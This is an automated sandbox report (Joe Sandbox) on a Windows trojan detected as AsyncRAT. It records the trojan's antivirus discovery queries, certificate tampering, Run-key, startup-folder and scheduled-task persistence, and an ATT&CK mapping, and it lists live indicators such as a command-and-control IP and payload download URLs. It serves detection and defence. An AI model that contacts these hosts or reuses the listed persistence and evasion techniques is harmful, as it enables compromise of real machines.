Source: xuXIetZvv6.exe, Ne - Copy.exe, wscript.exe, 00000006.00000002.492166002.000002F0A14C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.492229903.000001E6CDB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.493430213.0000013383450000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491091120.0000027802390000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: xuXIetZvv6.exe, Ne - Copy.exe, wscript.exe, 00000006.00000002.492166002.000002F0A14C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.492229903.000001E6CDB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.493430213.0000013383450000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491091120.0000027802390000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: wscript.exe, 00000006.00000002.492166002.000002F0A14C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.492229903.000001E6CDB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.493430213.0000013383450000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491091120.0000027802390000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: wscript.exe, 00000006.00000002.492166002.000002F0A14C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.492229903.000001E6CDB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.493430213.0000013383450000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491091120.0000027802390000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: wscript.exe, 00000006.00000002.492166002.000002F0A14C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.492229903.000001E6CDB30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.493430213.0000013383450000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491091120.0000027802390000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Ne - Copy.exe, 00000003.00000002.238481177.00000001400F0000.00000002.00020000.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory

Source: C:\ProgramData\conhost.exe

Code function: 8_2_00007FF7AB0083F0 cpuid

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Queries volume information: C:\Users\user\Desktop\xuXIetZvv6.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014001FD1E SetCurrentDirectoryW,malloc,GetSystemTimeAsFileTime,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140068C10 GetComputerNameW,GetUserNameW,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400CD9B4 HeapCreate,GetVersion,HeapSetInformation,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE

Source: conhost.exe, 00000008.00000002.497989554.000001E6CF86A000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.505339650.000001339D3E0000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490777554.0000027801ED0000.00000004.00000020.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ProgramData\conhost.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Blob

Jump to behavior

Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct

Source: Ne - Copy.exe	Binary or memory string: WIN_XP
Source: Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.33.06\AutoHotkey.exeWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003%04hX0x%IxpPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfo
Source: Ne - Copy.exe	Binary or memory string: WIN_VISTA
Source: Ne - Copy.exe	Binary or memory string: WIN_7
Source: Ne - Copy.exe	Binary or memory string: WIN_8
Source: Ne - Copy.exe	Binary or memory string: WIN_8.1

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001E310 PostThreadMessageW,Sleep,GetTickCount,GetExitCodeThread,GetTickCount,Sleep,CloseHandle,CreateMutexW,CloseHandle,CreateMutexW,CloseHandle,Shell_NotifyIconW,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140072DC0 RemoveClipboardFormatListener,ChangeClipboardChain,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001EFA0 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation11	Startup Items1	Startup Items1	Disable or Modify Tools21	Input Capture21	System Time Discovery11	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scripting311	Valid Accounts1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Scheduled Task/Job2	Valid Accounts1	Scripting311	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Non-Standard Port11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter1	Registry Run Keys / Startup Folder121	Access Token Manipulation11	Obfuscated Files or Information12	NTDS	System Information Discovery36	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Scheduled Task/Job2	Services File Permissions Weakness1	Process Injection12	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell3	Rc.common	Scheduled Task/Job2	Valid Accounts1	Cached Domain Credentials	Security Software Discovery481	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder121	Virtualization/Sandbox Evasion31	DCSync	Virtualization/Sandbox Evasion31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Services File Permissions Weakness1	Access Token Manipulation11	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Services File Permissions Weakness1	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xuXIetZvv6.exe	54%	Virustotal		Browse
xuXIetZvv6.exe	29%	Metadefender		Browse
xuXIetZvv6.exe	55%	ReversingLabs	Win32.Trojan.Wacatac
xuXIetZvv6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\conhost.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Ne - Copy.exe	26%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Ne - Copy.exe	41%	ReversingLabs	Win64.Trojan.VjWorm

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://46.1.54.174:77/Vre_Num	0%	Avira URL Cloud	safe
http://46.1.54.174/	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8	0%	Avira URL Cloud	safe
http://46.1.54.174:77/Vrey6	0%	Avira URL Cloud	safe
http://46.1.54.174:77/VreY	0%	Avira URL Cloud	safe
http://ocsp2.g	0%	Avira URL Cloud	safe
https://www.vbsedit.com/tr_register.asp?launcher=	0%	Avira URL Cloud	safe
http://secure.gl	0%	Avira URL Cloud	safe
http://crl.globalsi	0%	Avira URL Cloud	safe
http://46.1.54.174:77/Vreg	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://46.1.54.174:77/Vree	0%	Avira URL Cloud	safe
http://46.1.54.174:77/	0%	Avira URL Cloud	safe
http://46.1.54.174:77/Vrex	0%	Avira URL Cloud	safe
http://46.1.54.174:77/Vre	0%	Avira URL Cloud	safe
http://46.1.54.174/t	0%	Avira URL Cloud	safe
https://autohotkey.comCould	0%	URL Reputation	safe
https://autohotkey.comCould	0%	URL Reputation	safe
https://autohotkey.comCould	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gist.githubusercontent.com	185.199.108.133	true	false		unknown
www.uplooder.net	144.76.38.100	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://46.1.54.174:77/Vre	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	false		high
https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp30y	powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	false		high
https://autohotkey.com	Ne - Copy.exe, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	false		high
http://46.1.54.174:77/Vre_Num	conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174/	conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, conhost.exe, 00000011.00000002.494441942.0000027803EF3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8	xuXIetZvv6.exe, xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, wscript.exe, 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, wscript.exe, 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.uplooder.net	powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	false		high
http://46.1.54.174:77/Vrey6	conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174:77/VreY	conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp2.g	conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3	powershell.exe, 0000000E.00000002.491810873.0000013382F10000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.493315849.00000133830B5000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp	false		high
https://www.vbsedit.com/tr_register.asp?launcher=	conhost.exe	false	Avira URL Cloud: safe	unknown
http://secure.gl	conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	false		high
http://crl.globalsi	conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174:77/Vreg	conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	false		high
http://46.1.54.174:77/Vree	conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174:77/	conhost.exe, 00000011.00000003.246613450.0000027803CEA000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.244935879.00000278037FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174:77/Vrex	conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://46.1.54.174/t	conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.244669019.00000179B8E41000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.494107143.0000013384A61000.00000004.00000001.sdmp	false		high
https://autohotkey.comCould	xuXIetZvv6.exe, 00000000.00000000.219549326.00000000006E2000.00000002.00020000.sdmp, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
46.1.54.174	unknown	Turkey		34296	MILLENICOM-ASDE	true
144.76.38.100	www.uplooder.net	Germany		24940	HETZNER-ASDE	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	391271
Start date:	18.04.2021
Start time:	10:01:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 24s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	xuXIetZvv6.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@41/26@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 43% (good quality ratio 30.7%) Quality average: 54.4% Quality standard deviation: 40.3%
HCA Information:	Successful, ratio: 59% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.147.198.201, 204.79.197.200, 13.107.21.200, 104.42.151.234, 93.184.220.29, 20.50.102.62, 92.122.145.220, 13.88.21.125, 13.64.90.137, 8.248.139.254, 67.26.81.254, 8.253.207.121, 8.248.137.254, 8.248.113.254, 184.30.20.56, 92.122.213.194, 92.122.213.247, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:02:29	API Interceptor	1x Sleep call for process: Ne - Copy.exe modified
10:02:30	API Interceptor	2x Sleep call for process: OpenWith.exe modified
10:02:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest
10:02:34	Task Scheduler	Run new task: Skype path: C:\ProgramData\conhost.exe
10:02:35	API Interceptor	38x Sleep call for process: powershell.exe modified
10:02:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run VKRYQ2NT1P "C:\ProgramData\conhost.exe"
10:02:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run VKRYQ2NT1P "C:\ProgramData\conhost.exe"
10:03:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
10:03:08	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
46.1.54.174	wP3TwzqN.exe	Get hash	malicious	Browse
	SZ2xmjnm.exe	Get hash	malicious	Browse
	iqgUi5vz.exe	Get hash	malicious	Browse
	xHzAwYc1.exe	Get hash	malicious	Browse
	gf58KqeK.exe	Get hash	malicious	Browse

Domains

